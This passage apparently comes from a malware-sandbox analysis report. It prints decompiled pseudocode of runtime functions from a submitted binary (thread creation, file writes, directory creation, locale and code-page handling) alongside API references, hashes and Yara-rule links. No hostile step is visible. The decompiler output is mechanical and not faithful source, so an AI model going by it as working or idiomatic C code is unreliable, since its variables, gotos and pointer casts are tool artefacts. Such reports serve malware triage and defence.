						 *_t18 = _t22;
						 *0x00D0119C =  *((intOrPtr*)(0xd0119c)) + 1;
						_t8 =  *0xd081e0; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0xd01098);
					return _t8;
				}
				return _t5;
			}













                                                    0x00cd1024
                                                    0x00cd1028
                                                    0x00cd102c
                                                    0x00cd102f
                                                    0x00cd1043
                                                    0x00cd1049
                                                    0x00cd104b
                                                    0x00cd104d
                                                    0x00cd104f
                                                    0x00cd1054
                                                    0x00cd1059
                                                    0x00cd1071
                                                    0x00cd1071
                                                    0x00cd1076
                                                    0x00cd1078
                                                    0x00cd107e
                                                    0x00cd1085
                                                    0x00cd108a
                                                    0x00cd108a
                                                    0x00cd1090
                                                    0x00cd1091
                                                    0x00cd1094
                                                    0x00000000
                                                    0x00cd1099
                                                    0x00cd109d

                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00CD1043
                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 00CD108A
                                                      • Part of subcall function 00CC6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC6C54
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                                    • String ID: CreateThread failed
                                                    • API String ID: 2655393344-3849766595
                                                    • Opcode ID: 49e9d9b7b191eb955f366060037c9b91fdbedacc2e9031cf4e0ade25799ef18d
                                                    • Instruction ID: 97df4a88994c7d4a28464b8da6e808a5c9613c0f53dbb3127b493d5bd7711cf1
                                                    • Opcode Fuzzy Hash: 49e9d9b7b191eb955f366060037c9b91fdbedacc2e9031cf4e0ade25799ef18d
                                                    • Instruction Fuzzy Hash: 4101A2B93443497BD3346E64ED51F7A7398EB41751F24002FFA8692380CAE168858625
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E00CC9F7A() {
				void* __ecx;
				void* __ebp;
				long _t37;
				void* _t42;
				void* _t46;
				signed int _t49;
				intOrPtr* _t53;
				void** _t54;
				DWORD* _t61;
				void* _t65;
				intOrPtr _t66;
				long _t67;
				intOrPtr* _t69;
				void* _t70;

				_t67 =  *(_t70 + 0x18);
				_t69 = _t53;
				if(_t67 != 0) {
					_t54 = _t69 + 8;
					 *(_t70 + 0xc) = _t54;
					if( *((intOrPtr*)(_t69 + 0x10)) != 1) {
						 *(_t70 + 0xc) = _t54;
					} else {
						_t46 = GetStdHandle(0xfffffff5);
						_t54 = _t69 + 8;
						 *_t54 = _t46;
					}
					while(1) {
						 *(_t70 + 0x10) =  *(_t70 + 0x10) & 0x00000000;
						_t49 = 0;
						if( *((intOrPtr*)(_t69 + 0x10)) == 0) {
							goto L13;
						}
						_t65 = 0;
						if(_t67 == 0) {
							L15:
							if( *((char*)(_t69 + 0x1e)) == 0 ||  *((intOrPtr*)(_t69 + 0x10)) != 0) {
								L22:
								 *((char*)(_t69 + 0xc)) = 1;
								return _t49;
							} else {
								_t64 = _t69 + 0x32;
								if(E00CC6BAA(0xd01098, _t69 + 0x32, 0) == 0) {
									E00CC6E98(0xd01098, _t69, 0, _t64);
									goto L22;
								}
								_t54 =  *(_t70 + 0x14);
								if( *(_t70 + 0x10) < _t67 &&  *(_t70 + 0x10) > 0) {
									_t66 =  *_t69;
									 *0xcf3278(0);
									_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14))))();
									asm("sbb edx, 0x0");
									 *0xcf3278(_t42 -  *(_t70 + 0x14), _t61);
									 *((intOrPtr*)(_t66 + 0x10))();
									_t67 =  *(_t70 + 0x20);
									_t54 =  *(_t70 + 0x14);
								}
								continue;
							}
						} else {
							goto L8;
						}
						while(1) {
							L8:
							_t37 = _t67 - _t65;
							if(_t37 >= 0x4000) {
								_t37 = 0x4000;
							}
							_t61 = _t70 + 0x14;
							_t13 = WriteFile( *_t54,  *(_t70 + 0x28) + _t65, _t37, _t61, 0) == 1;
							_t49 = _t49 & 0xffffff00 | _t13;
							if(_t13 != 0) {
								break;
							}
							_t54 =  *(_t70 + 0x14);
							_t65 = _t65 + 0x4000;
							if(_t65 < _t67) {
								continue;
							}
							break;
						}
						L14:
						if(_t49 != 0) {
							goto L22;
						}
						goto L15;
						L13:
						WriteFile( *_t54,  *(_t70 + 0x28), _t67, _t70 + 0x14, 0);
						asm("sbb bl, bl");
						_t49 = 1;
						goto L14;
					}
				}
				return 1;
			}

















                                                    0x00cc9f7e
                                                    0x00cc9f82
                                                    0x00cc9f86
                                                    0x00cc9f93
                                                    0x00cc9f96
                                                    0x00cc9f9a
                                                    0x00cc9fab
                                                    0x00cc9f9c
                                                    0x00cc9f9e
                                                    0x00cc9fa4
                                                    0x00cc9fa7
                                                    0x00cc9fa7
                                                    0x00cc9fb1
                                                    0x00cc9fb1
                                                    0x00cc9fb6
                                                    0x00cc9fbc
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc9fbe
                                                    0x00cc9fc2
                                                    0x00cca024
                                                    0x00cca028
                                                    0x00cca0a2
                                                    0x00cca0a5
                                                    0x00000000
                                                    0x00cca030
                                                    0x00cca032
                                                    0x00cca042
                                                    0x00cca09d
                                                    0x00000000
                                                    0x00cca09d
                                                    0x00cca044
                                                    0x00cca04c
                                                    0x00cca05d
                                                    0x00cca067
                                                    0x00cca06f
                                                    0x00cca078
                                                    0x00cca07d
                                                    0x00cca085
                                                    0x00cca088
                                                    0x00cca08c
                                                    0x00cca08c
                                                    0x00000000
                                                    0x00cca04c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc9fc4
                                                    0x00cc9fc4
                                                    0x00cc9fc6
                                                    0x00cc9fcd
                                                    0x00cc9fcf
                                                    0x00cc9fcf
                                                    0x00cc9fd6
                                                    0x00cc9fee
                                                    0x00cc9fee
                                                    0x00cc9ff1
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc9ff3
                                                    0x00cc9ff7
                                                    0x00cc9fff
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cca001
                                                    0x00cca020
                                                    0x00cca022
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cca003
                                                    0x00cca011
                                                    0x00cca01c
                                                    0x00cca01e
                                                    0x00000000
                                                    0x00cca01e
                                                    0x00cc9fb1
                                                    0x00000000

                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00CCD343,00000001,?,?,?,00000000,00CD551D,?,?,?), ref: 00CC9F9E
                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00CD551D,?,?,?,?,?,00CD4FC7,?), ref: 00CC9FE5
                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00CCD343,00000001,?,?), ref: 00CCA011
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$Handle
                                                    • String ID:
                                                    • API String ID: 4209713984-0
                                                    • Opcode ID: 569eb953b9e19f97f4df6710abc0e56e3b901a90083bebfe7fea6b33e04743f4
                                                    • Instruction ID: b38c8215e631b9e70e08bc9cad3c2ea45145c874d711bd7d3574418246fc2abd
                                                    • Opcode Fuzzy Hash: 569eb953b9e19f97f4df6710abc0e56e3b901a90083bebfe7fea6b33e04743f4
                                                    • Instruction Fuzzy Hash: D231C031204349AFDB14CF20D80CF6EB7A5EF85754F00451DF89297290CB75AE88CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CCA2B2(void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t11;
				void* _t14;
				void* _t17;
				int _t24;
				long _t25;
				WCHAR* _t26;
				void* _t27;

				_t27 = __eflags;
				E00CDEC50(0x1000);
				_t26 = _a4;
				_t11 =  *(E00CCC27E(_t27, _t26)) & 0x0000ffff;
				if(_t11 != 0x2e && _t11 != 0x20) {
					_t24 = CreateDirectoryW(_t26, 0); // executed
					if(_t24 != 0) {
						L6:
						if(_a8 != 0) {
							E00CCA4ED(_t26, _a12); // executed
						}
						return 0;
					}
				}
				if(E00CCA231(_t26) == 0 && E00CCBB03(_t26,  &_v4100, 0x800) != 0 && CreateDirectoryW( &_v4100, 0) != 0) {
					goto L6;
				}
				_t25 = GetLastError();
				_t14 = 2;
				__eflags = _t25 - _t14;
				if(_t25 != _t14) {
					__eflags = _t25 - 3;
					_t17 = (0 | _t25 == 0x00000003) + 1;
					__eflags = _t17;
					return _t17;
				}
				return _t14;
			}











                                                    0x00cca2b2
                                                    0x00cca2ba
                                                    0x00cca2c0
                                                    0x00cca2c9
                                                    0x00cca2cf
                                                    0x00cca2d9
                                                    0x00cca2e1
                                                    0x00cca316
                                                    0x00cca31a
                                                    0x00cca320
                                                    0x00cca320
                                                    0x00000000
                                                    0x00cca325
                                                    0x00cca2e1
                                                    0x00cca2eb
                                                    0x00000000
                                                    0x00000000
                                                    0x00cca32f
                                                    0x00cca333
                                                    0x00cca334
                                                    0x00cca336
                                                    0x00cca33a
                                                    0x00cca340
                                                    0x00cca340
                                                    0x00000000
                                                    0x00cca340
                                                    0x00cca343

                                                    APIs
                                                      • Part of subcall function 00CCC27E: _wcslen.LIBCMT ref: 00CCC284
                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA2D9
                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA30C
                                                    • GetLastError.KERNEL32(?,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA329
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                    • String ID:
                                                    • API String ID: 2260680371-0
                                                    • Opcode ID: f39920de5fca2efca15e2ea8b120c7ff515a40072442e72c2635ec1b43f57c48
                                                    • Instruction ID: 752ca8df1bc4bd483af08d2b327e6a53d28a83fb8ad7cd8bbed4708503f00eca
                                                    • Opcode Fuzzy Hash: f39920de5fca2efca15e2ea8b120c7ff515a40072442e72c2635ec1b43f57c48
                                                    • Instruction Fuzzy Hash: 2E01B5712002A86AEF21ABB5CC5DFFD36489F09789F08441DF912D61A1DB54CB81D6B7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CEB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E00CEB893(void* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed char _v1828;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				void* _t67;
				signed char _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t87;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				char* _t94;
				intOrPtr _t96;
				signed int _t97;

				_t63 =  *0xcfe7ac; // 0x349e4b74
				_v8 = _t63 ^ _t97;
				_t96 = _a4;
				_t4 = _t96 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t96 + 0x119; // 0xcebee6
					_t93 = _t47;
					_t87 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t93;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t94 = _t93 + _t87;
						_t69 = _t68 + _t94;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t94 = 0;
							} else {
								_t72 = _t96 + _t87;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t87 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t96 + _t87 + 0x19) =  *(_t96 + _t87 + 0x19) | 0x00000010;
							_t54 = _t87 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t94 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t96 + 0x119; // 0xcebee6
						_t93 = _t61;
						_t87 = _t87 + 1;
						__eflags = _t87 - 0x100;
					} while (_t87 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t97 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t90 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t103 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t93 =  *(_t90 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t93;
							if(_t76 > _t93) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t97 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t90 = _t90 + 2;
						__eflags = _t90;
						_t75 =  *_t90;
					}
					_t13 = _t96 + 4; // 0x5efc4d8b
					E00CEC988(_t93, _t103, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t96 + 4; // 0x5efc4d8b
					_t19 = _t96 + 0x21c; // 0xdb855708
					E00CEAB78(0, _t103, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t96 + 4; // 0x5efc4d8b
					_t23 = _t96 + 0x21c; // 0xdb855708
					E00CEAB78(0, _t103, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t91 = 0;
					do {
						_t68 =  *(_t97 + _t91 * 2 - 0x704) & 0x0000ffff;
						if((_t68 & 0x00000001) == 0) {
							__eflags = _t68 & 0x00000002;
							if((_t68 & 0x00000002) == 0) {
								 *(_t96 + _t91 + 0x119) = 0;
							} else {
								_t37 = _t96 + _t91 + 0x19;
								 *_t37 =  *(_t96 + _t91 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t68 =  *((intOrPtr*)(_t97 + _t91 - 0x304));
								goto L15;
							}
						} else {
							 *(_t96 + _t91 + 0x19) =  *(_t96 + _t91 + 0x19) | 0x00000010;
							_t68 =  *((intOrPtr*)(_t97 + _t91 - 0x204));
							L15:
							 *(_t96 + _t91 + 0x119) = _t68;
						}
						_t91 = _t91 + 1;
					} while (_t91 < 0x100);
				}
				return E00CDFBBC(_t68, 0, _v8 ^ _t97, _t93, 0x100, _t96);
			}































                                                    0x00ceb89e
                                                    0x00ceb8a5
                                                    0x00ceb8aa
                                                    0x00ceb8b5
                                                    0x00ceb8c7
                                                    0x00ceb9bf
                                                    0x00ceb9bf
                                                    0x00ceb9c5
                                                    0x00ceb9c7
                                                    0x00ceb9c8
                                                    0x00ceb9c8
                                                    0x00ceb9ca
                                                    0x00ceb9d0
                                                    0x00ceb9d0
                                                    0x00ceb9d2
                                                    0x00ceb9d4
                                                    0x00ceb9dd
                                                    0x00ceb9e0
                                                    0x00ceb9ec
                                                    0x00ceb9f3
                                                    0x00ceba03
                                                    0x00ceb9f5
                                                    0x00ceb9f5
                                                    0x00ceb9f8
                                                    0x00ceb9f8
                                                    0x00ceb9f8
                                                    0x00ceb9fc
                                                    0x00ceb9fc
                                                    0x00000000
                                                    0x00ceb9fc
                                                    0x00ceb9e2
                                                    0x00ceb9e2
                                                    0x00ceb9e7
                                                    0x00ceb9e7
                                                    0x00ceb9ff
                                                    0x00ceb9ff
                                                    0x00ceb9ff
                                                    0x00ceba05
                                                    0x00ceba0b
                                                    0x00ceba0b
                                                    0x00ceba11
                                                    0x00ceba12
                                                    0x00ceba12
                                                    0x00ceb8cd
                                                    0x00ceb8cd
                                                    0x00ceb8cf
                                                    0x00ceb8cf
                                                    0x00ceb8d6
                                                    0x00ceb8d7
                                                    0x00ceb8db
                                                    0x00ceb8e1
                                                    0x00ceb8e7
                                                    0x00ceb90f
                                                    0x00ceb90f
                                                    0x00ceb911
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceb8f0
                                                    0x00ceb8f4
                                                    0x00ceb906
                                                    0x00ceb906
                                                    0x00ceb908
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceb8f9
                                                    0x00ceb8fb
                                                    0x00ceb8fd
                                                    0x00ceb905
                                                    0x00ceb905
                                                    0x00000000
                                                    0x00ceb905
                                                    0x00000000
                                                    0x00ceb8fb
                                                    0x00ceb90a
                                                    0x00ceb90a
                                                    0x00ceb90d
                                                    0x00ceb90d
                                                    0x00ceb914
                                                    0x00ceb929
                                                    0x00ceb92f
                                                    0x00ceb943
                                                    0x00ceb94a
                                                    0x00ceb959
                                                    0x00ceb96b
                                                    0x00ceb972
                                                    0x00ceb97a
                                                    0x00ceb97c
                                                    0x00ceb97c
                                                    0x00ceb986
                                                    0x00ceb996
                                                    0x00ceb998
                                                    0x00ceb9af
                                                    0x00ceb99a
                                                    0x00ceb99a
                                                    0x00ceb99a
                                                    0x00ceb99a
                                                    0x00ceb99f
                                                    0x00000000
                                                    0x00ceb99f
                                                    0x00ceb988
                                                    0x00ceb988
                                                    0x00ceb98d
                                                    0x00ceb9a6
                                                    0x00ceb9a6
                                                    0x00ceb9a6
                                                    0x00ceb9b6
                                                    0x00ceb9b7
                                                    0x00ceb9bb
                                                    0x00ceba26

                                                    APIs
                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00CEB8B8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Info
                                                    • String ID:
                                                    • API String ID: 1807457897-3916222277
                                                    • Opcode ID: 1f1455edf55e97627e25a626ac10b9e1ad5850d791c2474e81b9074f6c1b6319
                                                    • Instruction ID: 92b9e9f93c872134a54cd602f560f55df6221085a54b4803d8ac6619156fb471
                                                    • Opcode Fuzzy Hash: 1f1455edf55e97627e25a626ac10b9e1ad5850d791c2474e81b9074f6c1b6319
                                                    • Instruction Fuzzy Hash: 7141D4705043CC9ADB218E668C84BFBBBB9EB45304F1404EDE69A86143D335AE45DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CEAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 35%
                                                    			E00CEAF6C(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				void* __esi;
				signed int _t18;
				intOrPtr* _t20;
				int _t22;
				void* _t30;
				intOrPtr* _t33;
				void* _t34;
				signed int _t35;

				_t31 = __edi;
				_t26 = __ecx;
				_t25 = __ebx;
				_push(__ecx);
				_t18 =  *0xcfe7ac; // 0x349e4b74
				_v8 = _t18 ^ _t35;
				_t20 = E00CEAC98(0x16, "LCMapStringEx", 0xcf79c4, "LCMapStringEx"); // executed
				_t33 = _t20;
				if(_t33 == 0) {
					_t22 = LCMapStringW(E00CEAFF4(__ebx, _t26, _t30, __edi, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0xcf3278(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					_t22 =  *_t33();
				}
				_pop(_t34);
				return E00CDFBBC(_t22, _t25, _v8 ^ _t35, _t30, _t31, _t34);
			}












                                                    0x00ceaf6c
                                                    0x00ceaf6c
                                                    0x00ceaf6c
                                                    0x00ceaf71
                                                    0x00ceaf72
                                                    0x00ceaf79
                                                    0x00ceaf8e
                                                    0x00ceaf93
                                                    0x00ceaf9a
                                                    0x00ceafdd
                                                    0x00ceaf9c
                                                    0x00ceafb9
                                                    0x00ceafbf
                                                    0x00ceafbf
                                                    0x00ceafe8
                                                    0x00ceaff1

                                                    APIs
                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 00CEAFDD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: String
                                                    • String ID: LCMapStringEx
                                                    • API String ID: 2568140703-3893581201
                                                    • Opcode ID: 5f53721b55e8636569a98e9252636e6576ad3831beb36c04138e817e0097ffe1
                                                    • Instruction ID: b83b8dc36476b33bcd0162535b7b8f392401cfd5b762aa76264a2065a5854530
                                                    • Opcode Fuzzy Hash: 5f53721b55e8636569a98e9252636e6576ad3831beb36c04138e817e0097ffe1
                                                    • Instruction Fuzzy Hash: 4801483250424EBFCF02AF91DC06EEE7F62EF08750F014255FE1466160CA729A31EB82
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CEAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 21%
                                                    			E00CEAF0A(void* __ebx, void* __ecx, void* __edi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				void* __esi;
				signed int _t8;
				intOrPtr* _t10;
				int _t11;
				void* _t14;
				void* _t19;
				void* _t20;
				intOrPtr* _t22;
				void* _t23;
				signed int _t24;

				_t20 = __edi;
				_t14 = __ebx;
				_push(__ecx);
				_t8 =  *0xcfe7ac; // 0x349e4b74
				_v8 = _t8 ^ _t24;
				_t10 = E00CEAC98(0x14, "InitializeCriticalSectionEx", 0xcf79a0, "InitializeCriticalSectionEx"); // executed
				_t22 = _t10;
				if(_t22 == 0) {
					_t11 = InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0xcf3278(_a4, _a8, _a12);
					_t11 =  *_t22();
				}
				_pop(_t23);
				return E00CDFBBC(_t11, _t14, _v8 ^ _t24, _t19, _t20, _t23);
			}














                                                    0x00ceaf0a
                                                    0x00ceaf0a
                                                    0x00ceaf0f
                                                    0x00ceaf10
                                                    0x00ceaf17
                                                    0x00ceaf2c
                                                    0x00ceaf31
                                                    0x00ceaf38
                                                    0x00ceaf55
                                                    0x00ceaf3a
                                                    0x00ceaf45
                                                    0x00ceaf4b
                                                    0x00ceaf4b
                                                    0x00ceaf60
                                                    0x00ceaf69

                                                    APIs
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00CEA56F), ref: 00CEAF55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalInitializeSectionSpin
                                                    • String ID: InitializeCriticalSectionEx
                                                    • API String ID: 2593887523-3084827643
                                                    • Opcode ID: 29dcb787f1d2f98c507a9758f62a0640bf9140d1cb100988e91a86fb6c602d5e
                                                    • Instruction ID: fc4cbb317f9e729dde203cb9c92dda8b80ea303b88ff294820e25608ee909037
                                                    • Opcode Fuzzy Hash: 29dcb787f1d2f98c507a9758f62a0640bf9140d1cb100988e91a86fb6c602d5e
                                                    • Instruction Fuzzy Hash: 5EF0903164525CBFCF056F51CC06EBD7F61EF04B11B004165F90996260DA715B20E787
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CEADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 19%
                                                    			E00CEADAF(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* __esi;
				signed int _t4;
				intOrPtr* _t6;
				long _t7;
				void* _t10;
				void* _t15;
				void* _t16;
				intOrPtr* _t18;
				void* _t19;
				signed int _t20;

				_t16 = __edi;
				_t10 = __ebx;
				_push(__ecx);
				_t4 =  *0xcfe7ac; // 0x349e4b74
				_v8 = _t4 ^ _t20;
